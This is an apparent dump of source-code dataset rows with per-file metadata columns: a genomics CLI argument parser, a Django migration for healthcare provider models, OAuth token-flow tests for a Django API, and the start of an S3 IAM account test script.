value = os.getcwd()+"/"+value.replace(":", "-")
config[param]=value.replace(":", "-")
if param == "umi_length" or param == "l":
param = "umi_length"
try:
config[param]=int(value)
except:
PrintTime('error', "\tThe parameter's --"+param+" value should be an integer !\n\t\t\tExiting...")
exit()
if param == "bwa_threads" or param == "t":
param = "bwa_threads"
try:
config[param]=int(value)
except:
PrintTime('error', "\tThe parameter's --"+param+" value should be an integer !\n\t\t\tExiting...")
exit()
return config
# configure the variant calling tool
elif sys.argv[1] == "call":
if len(sys.argv) < 3:
PrintHelp("call")
### just in case script path contains '-' or '--'
sys.argv[0] = "None"
sys.argv.remove('call')
### default values for parameters
config["min_base_quality"] = 10
config["min_read_quality"] = 20
config["min_mapping_quality"] = 20
config["min_variant_umi"] = 5
config["strand_bias_method"] = "default"
config["output"] = os.getcwd()
config["pileup"] = "None"
config["cores"] = 1
config["default_cores"] = True
config["max_hp_length"] = 7
config["alpha"] = 0.05
config["gvcf"] = False
config["keep_pileup"] = True
### required parameters
# input : path to the bam/sam file
# fasta : path to the fasta file
# bed : path to the bed file
required = ['--input | -i', '--fasta | -f', '--bed | -b']
for param in required:
missing = False
for arg in param.split(" | "):
try:
test = sys.argv.index(arg)
missing = False
break
except:
missing = True
if missing:
PrintTime('error', "\tThe parameter "+param+" is required but missing !\n\t\t\tExiting...")
exit()
# print program name
PrintProgramName()
PrintTime("console", "\tConfiguring Parameters...")
# differentiate the '-' in fasta of the '-' for arguments
try:
fastaIdx = sys.argv.index("--fasta")
fastaIdx+=1
sys.argv[fastaIdx] = sys.argv[fastaIdx].replace("-", ":")
except:
try:
fastaIdx = sys.argv.index("-f")
fastaIdx+=1
sys.argv[fastaIdx] = sys.argv[fastaIdx].replace("-", ":")
except:
pass
# differentiate the '-' in bed of the '-' for arguments
try:
bedIdx = sys.argv.index("--bed")
bedIdx+=1
sys.argv[bedIdx] = sys.argv[bedIdx].replace("-", ":")
except:
try:
bedIdx = sys.argv.index("-b")
bedIdx+=1
sys.argv[bedIdx] = sys.argv[bedIdx].replace("-", ":")
except:
pass
# differentiate the '-' in input of the '-' for arguments
try:
inputIdx = sys.argv.index("--input")
inputIdx+=1
sys.argv[inputIdx] = sys.argv[inputIdx].replace("-", ":")
except:
try:
inputIdx = sys.argv.index("-i")
inputIdx+=1
sys.argv[inputIdx] = sys.argv[inputIdx].replace("-", ":")
except:
pass
# differentiate the '-' in output of the '-' for arguments
try:
outputIdx = sys.argv.index("--output")
outputIdx+=1
sys.argv[outputIdx] = sys.argv[outputIdx].replace("-", ":")
except:
try:
outputIdx = sys.argv.index("-o")
outputIdx+=1
sys.argv[outputIdx] = sys.argv[outputIdx].replace("-", ":")
except:
pass
# differentiate the '-' in pileup of the '-' for arguments
try:
pileupIdx = sys.argv.index("--pileup")
pileupIdx+=1
sys.argv[pileupIdx] = sys.argv[pileupIdx].replace("-", ":")
except:
try:
pileupIdx = sys.argv.index("-p")
pileupIdx+=1
sys.argv[pileupIdx] = sys.argv[pileupIdx].replace("-", ":")
except:
pass
### verify that no arguments are empty
params_in_config = ['input', 'bed', 'fasta', 'min_base_quality', 'min_read_quality', 'min_mapping_quality', 'min_variant_umi', 'strand_bias_method', 'max_strand_bias', 'output', 'pileup', 'cores', 'alpha', 'max_hp_length', 'gvcf', 'keep_pileup']
params_mini = ['i', 'b', 'f', 'x', 'x', 'x', 'x', 'x', 'x', 'o', 'p', 'c', 'x', 'x', 'x', 'x']
params = ['--input | -i', '--bed | -b', '--fasta | -f', '--min_base_quality', '--min_read_quality', '--min_mapping_quality', '--min_variant_umi', '--strand_bias_method', '--max_strand_bias', '--output | -o', '--pileup | -p', '--cores | -c', '--alpha' , '--max_hp_length', '--gvcf', '--keep_pileup']
pointer = 1
while pointer < len(sys.argv):
param = sys.argv[pointer]
try:
value = sys.argv[pointer+1]
except:
if "--" in param:
if param in ['--input', '--bed', '--fasta']:
PrintTime('error', "\tThe parameter "+params[params_in_config.index(param.replace("--", ""))]+" is required and cannot be empty !\n\t\t\tExiting...")
exit()
else:
if param.replace("--", "") in params_in_config:
PrintTime('error', "\tThe parameter's "+params[params_in_config.index(param.replace("--", ""))]+" value cannot be empty !\n\t\t\tExiting...")
exit()
else:
PrintTime('error', "\tThe parameter "+param+" is unknown !\n\t\t\tExiting...")
exit()
elif "-" in param and "--" not in param:
if param in ['-i', '-b', '-f']:
PrintTime('error', "\tThe parameter "+params[params_mini.index(param.replace("-", ""))]+" is required and cannot be empty !\n\t\t\tExiting...")
exit()
else:
if param.replace("-", "") in params_mini:
PrintTime('error', "\tThe parameter's "+params[params_mini.index(param.replace("-", ""))]+" value cannot be empty !\n\t\t\tExiting...")
exit()
else:
PrintTime('error', "\tThe parameter "+param+" is unknown !\n\t\t\tExiting...")
exit()
else:
PrintTime('error', "\tThe parameter "+param+" is unknown !\n\t\t\tExiting...")
exit()
if "-" in value and len(value) == 2:
PrintTime('error', "\tThe parameter "+param+" is required and cannot be empty !\n\t\t\tExiting...")
exit()
if "--" in value and len(value) > 3:
PrintTime('error', "\tThe parameter "+param+" is required and cannot be empty !\n\t\t\tExiting...")
exit()
pointer += 2
args=""
for arg in sys.argv:
args+=" "+arg
args = args.replace("--", "|")
args = args.replace("-", "|")
args = args.split("|")
del args[0]
sb_set = False
for arg in args:
param = arg.split(" ")[0]
value = arg.split(" ")[1]
if param == "input" or param == "i":
param = "input"
if value[0] != "/":
value = os.getcwd()+"/"+value.replace(":", "-")
config[param]=value.replace(":", "-")
if param == "fasta" or param == "f":
param = "fasta"
if value[0] != "/":
value = os.getcwd()+"/"+value.replace(":", "-")
config[param]=value.replace(":", "-")
if param == "bed" or param == "b":
param = "bed"
if value[0] != "/":
value = os.getcwd()+"/"+value.replace(":", "-")
config[param]=value.replace(":", "-")
if param == "pileup" or param == "p":
param = "pileup"
if value[0] != "/":
value = os.getcwd()+"/"+value.replace(":", "-")
config[param]=value.replace(":", "-")
if param == "output" or param == "o":
param = "output"
if value[0] != "/":
value = os.getcwd()+"/"+value.replace(":", "-")
config[param]=value.replace(":", "-")
if param == "cores" or param == "c":
param = "cores"
try:
config[param]=int(value)
config["default_cores"] = False
except:
PrintTime('error', "\tThe parameter's --"+param+" value should be an integer !\n\t\t\tExiting...")
exit()
if param == "min_base_quality":
try:
config[param]=float(value)
except:
PrintTime('error', "\tThe parameter's --"+param+" value should be a float or an integer !\n\t\t\tExiting...")
exit()
if param == "min_read_quality":
try:
config[param]=float(value)
except:
PrintTime('error', "\tThe parameter's --"+param+" value should be a float or an integer !\n\t\t\tExiting...")
exit()
if param == "min_mapping_quality":
try:
config[param]=float(value)
except:
PrintTime('error', "\tThe parameter's --"+param+" value should be a float or an integer !\n\t\t\tExiting...")
exit()
if param == "min_variant_umi":
try:
config[param]=float(value)
except:
PrintTime('error', "\tThe parameter's --"+param+" value should be a float or an integer !\n\t\t\tExiting...")
exit()
if param == "strand_bias_method":
value = str(value).replace("'", '').replace('"', "")
try:
test = value.index('default')
config[param]=value
except:
try:
test = value.index('torrent_suite')
config[param]=value
except:
PrintTime('error', "\tThe parameter --"+param+" can only be set to \"default\" or \"torrent_suite\" !\n\t\t\tExiting...")
exit()
if param == "max_strand_bias":
try:
config[param]=float(value)
sb_set = True
except:
PrintTime('error', "\tThe parameter's --"+param+" value should be a float or an integer !\n\t\t\tExiting...")
exit()
if param == "alpha":
try:
config[param]=float(value)
except:
PrintTime('error', "\tThe parameter's --"+param+" value should be a float or an integer !\n\t\t\tExiting...")
exit()
if param == "max_hp_length":
try:
config[param]=float(value)
except:
PrintTime('error', "\tThe parameter's --"+param+" value should be a float or an integer !\n\t\t\tExiting...")
exit()
if param == "gvcf":
value = value.lower()
if value in ['true', 'false']:
value = True if value == 'true' else False
config[param]=value
else:
PrintTime('error', "\tThe parameter's --"+param+" value should be a boolean (True/False) !\n\t\t\tExiting...")
exit()
if param == "keep_pileup":
value = value.lower()
if value in ['true', 'false']:
value = True if value == 'true' else False
config[param]=value
else:
PrintTime('error', "\tThe parameter's --"+param+" value should be a boolean (True/False) !\n\t\t\tExiting...")
exit()
if not sb_set:
if config["strand_bias_method"] == "default":
config["max_strand_bias"] = 1.0
else:
config["max_strand_bias"] = 0.743
return config
else:
PrintTime('error', "\tPlease precise the tool you want to use first!\n\t\t\tExiting...")
exit()
| 25.558974
| 300
| 0.575508
| 1,920
| 14,952
| 4.427604
| 0.093229
| 0.053523
| 0.011999
| 0.043995
| 0.807317
| 0.769557
| 0.752147
| 0.739325
| 0.736031
| 0.736031
| 0
| 0.005455
| 0.227528
| 14,952
| 584
| 301
| 25.60274
| 0.730563
| 0.082865
| 0
| 0.779793
| 0
| 0
| 0.283821
| 0.003294
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002591
| false
| 0.018135
| 0.012953
| 0
| 0.020725
| 0.002591
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
54d84dc10f8feff7b69afdf71625c7e783b6f4ec
| 3,562
|
py
|
Python
|
apps/provider/migrations/0001_initial.py
|
videntity/hhs_oauth_client
|
f66596082d76a0eed20143d30c241d489c06bcf3
|
[
"Apache-2.0"
] | 2
|
2016-08-03T16:33:20.000Z
|
2021-01-27T09:39:40.000Z
|
apps/provider/migrations/0001_initial.py
|
HHSIDEAlab/hhs_oauth_client
|
f66596082d76a0eed20143d30c241d489c06bcf3
|
[
"Apache-2.0"
] | null | null | null |
apps/provider/migrations/0001_initial.py
|
HHSIDEAlab/hhs_oauth_client
|
f66596082d76a0eed20143d30c241d489c06bcf3
|
[
"Apache-2.0"
] | 3
|
2016-06-08T14:36:24.000Z
|
2017-05-15T16:17:05.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Address',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('fhir_json_snipit', models.TextField(default='', max_length=2000)),
],
),
migrations.CreateModel(
name='Affiliation',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('fhir_json_snipit', models.TextField(default='', max_length=2000)),
],
),
migrations.CreateModel(
name='License',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('fhir_json_snipit', models.TextField(default='', max_length=2000)),
],
),
migrations.CreateModel(
name='Organization',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('npi', models.CharField(default='', max_length=10)),
('fhir_id', models.CharField(default='', max_length=24)),
('organization_name', models.CharField(default='', max_length=256)),
('doing_business_as', models.CharField(default='', max_length=256)),
('addresses', models.ForeignKey(blank=True, to='provider.Address', null=True)),
('affiliations', models.ForeignKey(blank=True, to='provider.Affiliation', null=True)),
('licenses', models.ForeignKey(blank=True, to='provider.License', null=True)),
],
),
migrations.CreateModel(
name='Practitioner',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('npi', models.CharField(default='', max_length=10)),
('fhir_id', models.CharField(default='', max_length=24)),
('first_name', models.CharField(default='', max_length=256)),
('last_name', models.CharField(default='', max_length=256)),
('doing_business_as', models.CharField(default='', max_length=256)),
('addresses', models.ForeignKey(blank=True, to='provider.Address', null=True)),
('affiliations', models.ForeignKey(blank=True, to='provider.Affiliation', null=True)),
('licenses', models.ForeignKey(blank=True, to='provider.License', null=True)),
],
),
migrations.CreateModel(
name='Taxonomy',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('fhir_json_snipit', models.TextField(default='', max_length=2000)),
],
),
migrations.AddField(
model_name='practitioner',
name='taxonomies',
field=models.ForeignKey(blank=True, to='provider.Taxonomy', null=True),
),
migrations.AddField(
model_name='organization',
name='taxonomies',
field=models.ForeignKey(blank=True, to='provider.Taxonomy', null=True),
),
]
| 45.088608
| 114
| 0.569624
| 336
| 3,562
| 5.875
| 0.193452
| 0.065856
| 0.10537
| 0.113982
| 0.847518
| 0.847518
| 0.847518
| 0.828267
| 0.828267
| 0.828267
| 0
| 0.015601
| 0.28018
| 3,562
| 78
| 115
| 45.666667
| 0.75429
| 0.005896
| 0
| 0.75
| 0
| 0
| 0.134219
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.027778
| 0
| 0.069444
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0766b3ef04aa74b82c4eede4edfebd339a596183
| 17,086
|
py
|
Python
|
apps/dot_ext/tests/test_authorization.py
|
johnfrenchxyz/bluebutton-web-server
|
27adc139ddd511cc8d3e601726fa93eda89133fd
|
[
"Apache-2.0"
] | null | null | null |
apps/dot_ext/tests/test_authorization.py
|
johnfrenchxyz/bluebutton-web-server
|
27adc139ddd511cc8d3e601726fa93eda89133fd
|
[
"Apache-2.0"
] | null | null | null |
apps/dot_ext/tests/test_authorization.py
|
johnfrenchxyz/bluebutton-web-server
|
27adc139ddd511cc8d3e601726fa93eda89133fd
|
[
"Apache-2.0"
] | null | null | null |
from oauth2_provider.compat import parse_qs, urlparse
from oauth2_provider.models import get_access_token_model, get_refresh_token_model
from django.urls import reverse
from django.test import Client
from apps.test import BaseApiTest
from ..models import Application, ArchivedToken
from apps.authorization.models import DataAccessGrant, ArchivedDataAccessGrant
AccessToken = get_access_token_model()
RefreshToken = get_refresh_token_model()
class TestAuthorizeWithCustomScheme(BaseApiTest):
def test_post_with_valid_non_standard_scheme(self):
redirect_uri = 'com.custom.bluebutton://example.it'
# create a user
self._create_user('anna', '123456')
capability_a = self._create_capability('Capability A', [])
capability_b = self._create_capability('Capability B', [])
# create an application and add capabilities
application = self._create_application(
'an app',
grant_type=Application.GRANT_AUTHORIZATION_CODE,
redirect_uris=redirect_uri)
application.scope.add(capability_a, capability_b)
# user logs in
self.client.login(username='anna', password='123456')
code_challenge = "sZrievZsrYqxdnu2NVD603EiYBM18CuzZpwB-pOSZjo"
payload = {
'client_id': application.client_id,
'response_type': 'code',
'redirect_uri': redirect_uri,
'code_challenge': code_challenge,
'code_challenge_method': 'S256',
}
response = self.client.get('/v1/o/authorize', data=payload)
# post the authorization form with only one scope selected
payload = {
'client_id': application.client_id,
'response_type': 'code',
'redirect_uri': redirect_uri,
'scope': ['capability-a'],
'expires_in': 86400,
'allow': True,
'code_challenge': code_challenge,
'code_challenge_method': 'S256',
}
response = self.client.post(response['Location'], data=payload)
self.assertEqual(response.status_code, 302)
# now extract the authorization code and use it to request an access_token
query_dict = parse_qs(urlparse(response['Location']).query)
authorization_code = query_dict.pop('code')
token_request_data = {
'grant_type': 'authorization_code',
'code': authorization_code,
'redirect_uri': redirect_uri,
'client_id': application.client_id,
'code_verifier': 'test123456789123456789123456789123456789123456789',
}
response = self.client.post(reverse('oauth2_provider:token'), data=token_request_data)
self.assertEqual(response.status_code, 200)
def test_post_with_invalid_non_standard_scheme(self):
redirect_uri = 'com.custom.bluebutton://example.it'
bad_redirect_uri = 'com.custom.bad://example.it'
# create a user
self._create_user('anna', '123456')
capability_a = self._create_capability('Capability A', [])
capability_b = self._create_capability('Capability B', [])
# create an application and add capabilities
application = self._create_application(
'an app',
grant_type=Application.GRANT_AUTHORIZATION_CODE,
redirect_uris=redirect_uri)
application.scope.add(capability_a, capability_b)
# user logs in
self.client.login(username='anna', password='123456')
# post the authorization form with only one scope selected
payload = {
'client_id': application.client_id,
'response_type': 'code',
'redirect_uri': bad_redirect_uri,
'scope': ['capability-a'],
'expires_in': 86400,
'allow': True,
}
response = self.client.post(reverse('oauth2_provider:authorize'), data=payload)
self.assertEqual(response.status_code, 400)
def test_refresh_token(self):
redirect_uri = 'http://localhost'
# create a user
self._create_user('anna', '123456')
capability_a = self._create_capability('Capability A', [])
capability_b = self._create_capability('Capability B', [])
# create an application and add capabilities
application = self._create_application(
'an app',
grant_type=Application.GRANT_AUTHORIZATION_CODE,
client_type=Application.CLIENT_CONFIDENTIAL,
redirect_uris=redirect_uri)
application.scope.add(capability_a, capability_b)
# user logs in
self.client.login(username='anna', password='123456')
# post the authorization form with only one scope selected
payload = {
'client_id': application.client_id,
'response_type': 'code',
'redirect_uri': redirect_uri,
'scope': ['capability-a'],
'expires_in': 86400,
'allow': True,
}
response = self.client.post(reverse('oauth2_provider:authorize'), data=payload)
self.client.logout()
self.assertEqual(response.status_code, 302)
# now extract the authorization code and use it to request an access_token
query_dict = parse_qs(urlparse(response['Location']).query)
authorization_code = query_dict.pop('code')
token_request_data = {
'grant_type': 'authorization_code',
'code': authorization_code,
'redirect_uri': redirect_uri,
'client_id': application.client_id,
'client_secret': application.client_secret,
}
c = Client()
response = c.post('/v1/o/token/', data=token_request_data)
self.assertEqual(response.status_code, 200)
# Now we have a token and refresh token
tkn = response.json()['access_token']
refresh_tkn = response.json()['refresh_token']
refresh_request_data = {
'grant_type': 'refresh_token',
'refresh_token': refresh_tkn,
'redirect_uri': redirect_uri,
'client_id': application.client_id,
'client_secret': application.client_secret,
}
response = self.client.post(reverse('oauth2_provider:token'), data=refresh_request_data)
self.assertEqual(response.status_code, 200)
self.assertNotEqual(response.json()['access_token'], tkn)
def test_refresh_with_expired_token(self):
redirect_uri = 'http://localhost'
# create a user
self._create_user('anna', '123456')
capability_a = self._create_capability('Capability A', [])
capability_b = self._create_capability('Capability B', [])
# create an application and add capabilities
application = self._create_application(
'an app',
grant_type=Application.GRANT_AUTHORIZATION_CODE,
client_type=Application.CLIENT_CONFIDENTIAL,
redirect_uris=redirect_uri)
application.scope.add(capability_a, capability_b)
# user logs in
self.client.login(username='anna', password='123456')
# post the authorization form with only one scope selected
payload = {
'client_id': application.client_id,
'response_type': 'code',
'redirect_uri': redirect_uri,
'scope': ['capability-a'],
'expires_in': 86400,
'allow': True,
}
response = self.client.post(reverse('oauth2_provider:authorize'), data=payload)
self.client.logout()
self.assertEqual(response.status_code, 302)
# now extract the authorization code and use it to request an access_token
query_dict = parse_qs(urlparse(response['Location']).query)
authorization_code = query_dict.pop('code')
token_request_data = {
'grant_type': 'authorization_code',
'code': authorization_code,
'redirect_uri': redirect_uri,
'client_id': application.client_id,
'client_secret': application.client_secret,
}
c = Client()
response = c.post('/v1/o/token/', data=token_request_data)
self.assertEqual(response.status_code, 200)
# Now we have a token and refresh token
tkn = response.json()['access_token']
refresh_tkn = response.json()['refresh_token']
at = AccessToken.objects.get(token=tkn)
at.delete()
refresh_request_data = {
'grant_type': 'refresh_token',
'refresh_token': refresh_tkn,
'redirect_uri': redirect_uri,
'client_id': application.client_id,
'client_secret': application.client_secret,
}
response = self.client.post(reverse('oauth2_provider:token'), data=refresh_request_data)
self.assertEqual(response.status_code, 401)
def test_refresh_with_revoked_token(self):
redirect_uri = 'http://localhost'
# create a user
self._create_user('anna', '123456')
capability_a = self._create_capability('Capability A', [])
capability_b = self._create_capability('Capability B', [])
# create an application and add capabilities
application = self._create_application(
'an app',
grant_type=Application.GRANT_AUTHORIZATION_CODE,
client_type=Application.CLIENT_CONFIDENTIAL,
redirect_uris=redirect_uri)
application.scope.add(capability_a, capability_b)
# user logs in
self.client.login(username='anna', password='123456')
# post the authorization form with only one scope selected
payload = {
'client_id': application.client_id,
'response_type': 'code',
'redirect_uri': redirect_uri,
'scope': ['capability-a'],
'expires_in': 86400,
'allow': True,
}
response = self.client.post(reverse('oauth2_provider:authorize'), data=payload)
self.client.logout()
self.assertEqual(response.status_code, 302)
# now extract the authorization code and use it to request an access_token
query_dict = parse_qs(urlparse(response['Location']).query)
authorization_code = query_dict.pop('code')
token_request_data = {
'grant_type': 'authorization_code',
'code': authorization_code,
'redirect_uri': redirect_uri,
'client_id': application.client_id,
'client_secret': application.client_secret,
}
c = Client()
response = c.post('/v1/o/token/', data=token_request_data)
self.assertEqual(response.status_code, 200)
# Now we have a token and refresh token
tkn = response.json()['access_token']
revoke_request_data = {
'token': tkn,
'client_id': application.client_id,
'client_secret': application.client_secret,
}
rev_response = c.post('/v1/o/revoke_token/', data=revoke_request_data)
self.assertEqual(rev_response.status_code, 200)
archived_token = ArchivedToken.objects.get(token=tkn)
self.assertEqual(application.id, archived_token.application.id)
self.assertEqual(tkn, archived_token.token)
refresh_tkn = response.json()['refresh_token']
refresh_request_data = {
'grant_type': 'refresh_token',
'refresh_token': refresh_tkn,
'redirect_uri': redirect_uri,
'client_id': application.client_id,
'client_secret': application.client_secret,
}
response = self.client.post(reverse('oauth2_provider:token'), data=refresh_request_data)
self.assertEqual(response.status_code, 401)
self.assertEqual(response.content, b'{"error": "invalid_grant"}')
def test_application_delete_after_auth(self):
# Test that there are no errors with cascading deletes
redirect_uri = 'http://localhost'
# create a user
self._create_user('anna', '123456')
capability_a = self._create_capability('Capability A', [])
capability_b = self._create_capability('Capability B', [])
# create an application and add capabilities
application = self._create_application(
'an app',
grant_type=Application.GRANT_AUTHORIZATION_CODE,
client_type=Application.CLIENT_CONFIDENTIAL,
redirect_uris=redirect_uri)
application.scope.add(capability_a, capability_b)
# user logs in
self.client.login(username='anna', password='123456')
# post the authorization form with only one scope selected
payload = {
'client_id': application.client_id,
'response_type': 'code',
'redirect_uri': redirect_uri,
'scope': ['capability-a'],
'expires_in': 86400,
'allow': True,
}
response = self.client.post(reverse('oauth2_provider:authorize'), data=payload)
self.client.logout()
self.assertEqual(response.status_code, 302)
# now extract the authorization code and use it to request an access_token
query_dict = parse_qs(urlparse(response['Location']).query)
authorization_code = query_dict.pop('code')
token_request_data = {
'grant_type': 'authorization_code',
'code': authorization_code,
'redirect_uri': redirect_uri,
'client_id': application.client_id,
'client_secret': application.client_secret,
}
c = Client()
response = c.post('/v1/o/token/', data=token_request_data)
self.assertEqual(response.status_code, 200)
# Now we have a token and refresh token
tkn = response.json()['access_token']
refresh_tkn = response.json()['refresh_token']
# Test for cascading contraint errors.
application_pk = application.pk
application.delete()
# Test related objects are deleted
self.assertFalse(AccessToken.objects.filter(token=tkn).exists())
self.assertTrue(ArchivedToken.objects.filter(token=tkn).exists())
self.assertFalse(RefreshToken.objects.filter(token=refresh_tkn).exists())
self.assertFalse(DataAccessGrant.objects.filter(application__pk=application_pk).exists())
self.assertTrue(ArchivedDataAccessGrant.objects.filter(application__pk=application_pk).exists())
def test_user_delete_after_auth(self):
# Test that there are no errors with cascading deletes
redirect_uri = 'http://localhost'
# create a user
user = self._create_user('anna', '123456')
capability_a = self._create_capability('Capability A', [])
capability_b = self._create_capability('Capability B', [])
# create an application and add capabilities
application = self._create_application(
'an app',
grant_type=Application.GRANT_AUTHORIZATION_CODE,
client_type=Application.CLIENT_CONFIDENTIAL,
redirect_uris=redirect_uri)
application.scope.add(capability_a, capability_b)
# user logs in
self.client.login(username='anna', password='123456')
# post the authorization form with only one scope selected
payload = {
'client_id': application.client_id,
'response_type': 'code',
'redirect_uri': redirect_uri,
'scope': ['capability-a'],
'expires_in': 86400,
'allow': True,
}
response = self.client.post(reverse('oauth2_provider:authorize'), data=payload)
self.client.logout()
self.assertEqual(response.status_code, 302)
# now extract the authorization code and use it to request an access_token
query_dict = parse_qs(urlparse(response['Location']).query)
authorization_code = query_dict.pop('code')
token_request_data = {
'grant_type': 'authorization_code',
'code': authorization_code,
'redirect_uri': redirect_uri,
'client_id': application.client_id,
'client_secret': application.client_secret,
}
c = Client()
response = c.post('/v1/o/token/', data=token_request_data)
self.assertEqual(response.status_code, 200)
# Now we have a token and refresh token
tkn = response.json()['access_token']
refresh_tkn = response.json()['refresh_token']
# Test for cascading contraint errors.
user_pk = user.pk
user.delete()
# Test related objects are deleted
self.assertFalse(AccessToken.objects.filter(token=tkn).exists())
self.assertTrue(ArchivedToken.objects.filter(token=tkn).exists())
self.assertFalse(RefreshToken.objects.filter(token=refresh_tkn).exists())
self.assertFalse(DataAccessGrant.objects.filter(beneficiary__pk=user_pk).exists())
self.assertTrue(ArchivedDataAccessGrant.objects.filter(beneficiary__pk=user_pk).exists())
| 45.201058
| 104
| 0.641285
| 1,839
| 17,086
| 5.706362
| 0.079935
| 0.051363
| 0.03259
| 0.042882
| 0.889937
| 0.888412
| 0.888412
| 0.864208
| 0.863922
| 0.859825
| 0
| 0.019337
| 0.255414
| 17,086
| 377
| 105
| 45.320955
| 0.805534
| 0.103125
| 0
| 0.8
| 0
| 0
| 0.158856
| 0.030305
| 0
| 0
| 0
| 0
| 0.098413
| 1
| 0.022222
| false
| 0.022222
| 0.022222
| 0
| 0.047619
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4ade0862fe46404d1a8e0bef326516302d489d02
| 114,235
|
py
|
Python
|
st/clitests/auth_spec.py
|
sanalpk/cortx-s3server
|
62b2b7d04111efceae9cbed333d690b8c1162ac8
|
[
"Apache-2.0"
] | 35
|
2020-09-25T07:27:10.000Z
|
2022-03-23T07:49:57.000Z
|
st/clitests/auth_spec.py
|
sanalpk/cortx-s3server
|
62b2b7d04111efceae9cbed333d690b8c1162ac8
|
[
"Apache-2.0"
] | 1,000
|
2020-09-24T13:10:23.000Z
|
2022-03-28T08:19:34.000Z
|
st/clitests/auth_spec.py
|
sanalpk/cortx-s3server
|
62b2b7d04111efceae9cbed333d690b8c1162ac8
|
[
"Apache-2.0"
] | 150
|
2020-09-24T14:41:40.000Z
|
2022-03-04T05:37:17.000Z
|
#
# Copyright (c) 2020 Seagate Technology LLC and/or its Affiliates
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# For any questions about this software or licensing,
# please email opensource@seagate.com or cortx-questions@seagate.com.
#
import os
import sys
import yaml
import time
from ldap_setup import LdapInfo
from framework import Config
from framework import S3PyCliTest
from auth import AuthTest
from s3client_config import S3ClientConfig
from s3cmd import S3cmdTest
from s3fi import S3fiTest
from awss3api import AwsTest
from shutil import copyfile
import shutil
from s3confstore.cortx_s3_confstore import S3CortxConfStore
home_dir = os.path.expanduser("~")
original_config_file = os.path.join(home_dir, '.sgs3iamcli/config.yaml')
backup_config_file = os.path.join(home_dir, '.sgs3iamcli/backup_config.yaml')
# Helps debugging
# Config.log_enabled = True
# Config.dummy_run = True
# Set time_readable_format to False if you want to display the time in milli seconds.
# Config.time_readable_format = False
# global params required for suit
def update_config_yaml(new_config_entries):
shutil.copy2(original_config_file, backup_config_file)
with open(original_config_file, 'r') as f:
cur_yaml = yaml.load(f)
cur_yaml.update(new_config_entries)
with open(original_config_file, 'w') as f:
yaml.dump(cur_yaml, f, default_flow_style = False)
def restore_config_yaml():
# Restore original ~/.sgs3iamcli/config.yaml file
shutil.copy2(backup_config_file, original_config_file)
class GlobalTestState():
root_access_key = ""
root_secret_key = ""
# Extract the response elements from response which has the following format
# <Key 1> = <Value 1>, <Key 2> = <Value 2> ... <Key n> = <Value n>
def get_response_elements(response):
response_elements = {}
key_pairs = response.split(',')
for key_pair in key_pairs:
tokens = key_pair.split('=')
response_elements[tokens[0].strip()] = tokens[1].strip()
return response_elements
# Load test config file
def load_test_config():
conf_file = os.path.join(os.path.dirname(__file__),'s3iamcli_test_config.yaml')
with open(conf_file, 'r') as f:
config = yaml.safe_load(f)
S3ClientConfig.ldapuser = config['ldapuser']
S3ClientConfig.ldappasswd = config['ldappasswd']
# Run before all to setup the test environment.
def before_all():
load_test_config()
print("Configuring LDAP")
S3PyCliTest('Before_all').before_all()
# Set S3ClientConfig with root credentials
def _use_root_credentials():
S3ClientConfig.access_key_id = GlobalTestState.root_access_key
S3ClientConfig.secret_key = GlobalTestState.root_secret_key
# Test create account API
def account_tests():
# Test Create Account with keys
# 1. Positive
test_msg = "Create account s3testwithkeys1 with Access key and Secret key"
account_args = {
'AccountName': 's3testwithkeys1',
'Email': 's3testwithkeys1@seagate.com',
'ldapuser': S3ClientConfig.ldapuser,
'ldappasswd': S3ClientConfig.ldappasswd,
'access_key': 'AAAAAAAAAAAAAAAAA1',
'secret_key': 'SSSSSSSSS1'
}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result = AuthTest(test_msg).create_account(**account_args).execute_test()
result.command_should_match_pattern(account_response_pattern)
account_response_elements = get_response_elements(result.status.stdout)
AuthTest("Test passed. Deleting account.").delete_account(**account_args).execute_test()
# 2. Negative
test_msg = "Create account s3testwithkeys2 with only Access key"
account_args = {
'AccountName': 's3testwithkeys2',
'Email': 's3testwithkeys2@seagate.com',
'ldapuser': S3ClientConfig.ldapuser,
'ldappasswd': S3ClientConfig.ldappasswd,
'access_key': 'AAAAAAAAAAAAAAAAA2'
}
result = AuthTest(test_msg).create_account(**account_args).execute_test(negative_case=True)
